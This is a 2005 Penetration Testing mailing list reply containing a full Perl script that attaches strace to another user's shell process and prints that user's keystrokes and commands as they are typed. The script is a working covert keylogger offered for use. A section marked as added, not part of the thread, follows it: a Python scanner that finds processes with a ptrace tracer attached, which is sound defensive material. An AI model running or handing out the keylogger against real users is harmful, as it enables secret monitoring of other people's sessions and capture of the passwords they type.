Penetration Testing mailing list archives
Re: Keystroke logging with strace (no setup required)
From: rootsuid <rootsuid () gmail com>
Date: Tue, 12 Jul 2005 19:15:46 +0000
I didn't like going between terminals (even through screen), so I just changed the one line:

---
open (F, "tail -f $ARGV[0] |");
----

changes to

open (F, "strace -p $ARGV[0] 2>&1 |");

----

Then you run ./strace_clean.pl <PID>. Also, if you aren't familiar with Perl, this script is waiting for line returns (so it does work on other applications too, but you will not see the text until the user hits enter, vim, etc.).

--root

-----
strace_clean-new.pl

#!/usr/bin/perl -w
#
# Monitoring a user's shell commands by using strace and displaying and cleaning
# up the read() syscalls.
# Based on the tip posted to secfocus by Mark Lachniet, written by Tom Van de Wiele.
#
# The original version read a logfile produced like this (in one terminal):
#
#   # script /tmp/what_is_user_foo_doing.log
#   Script started, file is /tmp/what_is_user_foo_doing.log
#   # strace -p <PID of shell of user>
#
# and, using a different terminal at the same time:
#
#   perl strace_clean.pl /tmp/what_is_user_doing.log
#
# This version runs strace itself, so it takes the PID directly:
#
#   ./strace_clean.pl <PID of shell of user>
#

use strict;

# hi Kris :)

die "usage: $0 <PID>\n" unless @ARGV == 1 && $ARGV[0] =~ /^\d+$/;

# Unbuffer STDOUT so each decoded key shows up as soon as strace reports it.
$| = 1;

my $char;

# strace writes its trace to stderr, hence the 2>&1.
open (F, "strace -p $ARGV[0] 2>&1 |") or die "cannot run strace: $!\n";

while (<F>) {
    next if !/^read/;                # only read() calls are of interest
    next if /^$/;
    if (/^read\(0,\s\"(.*)\".*/) {   # fd 0 = the traced shell's stdin
        $char = $1;
        if ($char =~ /\\r/) {        # carriage return: the user hit enter
            print "\n";
        } elsif ($char =~ /\\177/) { # DEL: backspace
            print "\b";
        } elsif ($char =~ /\\t/) {
            print "<TAB>";
        } else {
            print $char;
        }
    }
}

close (F);

#EOF
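A defender-side companion, added here and not part of the thread or its script: "strace -p" attaches to the shell with ptrace, and on Linux a process with a tracer attached shows a non-zero TracerPid in /proc/<pid>/status, so a scan of /proc reveals which processes are currently being traced and by whom. The sample status text below is constructed; the scan assumes a Linux /proc filesystem.

```python
# Added example: list processes that currently have a ptrace tracer attached
# (what "strace -p <PID>" does to the traced shell). Linux /proc assumed.
import os
import re

_TRACER_RE = re.compile(r"^TracerPid:\s*(\d+)", re.MULTILINE)
_NAME_RE = re.compile(r"^Name:\s*(.*)$", re.MULTILINE)


def tracer_pid(status_text):
    """Return the TracerPid value from /proc/<pid>/status text (0 = not traced)."""
    m = _TRACER_RE.search(status_text)
    if not m:
        raise ValueError("no TracerPid line in status text")
    return int(m.group(1))


def find_traced(statuses):
    """statuses: iterable of (pid, status_text).
    Return [(pid, name, tracer_pid)] for every process whose TracerPid is non-zero."""
    found = []
    for pid, text in statuses:
        tp = tracer_pid(text)
        if tp:
            name = _NAME_RE.search(text)
            found.append((pid, name.group(1) if name else "?", tp))
    return found


def read_proc_statuses(proc="/proc"):
    """Yield (pid, status_text) for every numeric entry under /proc we can read."""
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "status")) as f:
                yield int(entry), f.read()
        except OSError:
            continue  # process exited, or not readable by this user


# Constructed sample: a bash (pid 1234) stopped under a tracer with pid 4242.
SAMPLE_STATUS = ("Name:\tbash\nUmask:\t0022\nState:\tt (tracing stop)\n"
                 "Pid:\t1234\nTracerPid:\t4242\n")

if __name__ == "__main__":
    for pid, name, tp in find_traced(read_proc_statuses()):
        print(f"pid {pid} ({name}) is being traced by pid {tp}")
```

Limiting who may attach in the first place is a separate control (on Linux, Yama's kernel.yama.ptrace_scope sysctl).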
Current thread:
- Keystroke logging with strace (no setup required) Lachniet, Mark (Jul 07)
- <Possible follow-ups>
- RE: Keystroke logging with strace (no setup required) Lachniet, Mark (Jul 12)
- Re: Keystroke logging with strace (no setup required) rootsuid (Jul 12)
- Re: Keystroke logging with strace (no setup required) Can't dig that daddy (Jul 18)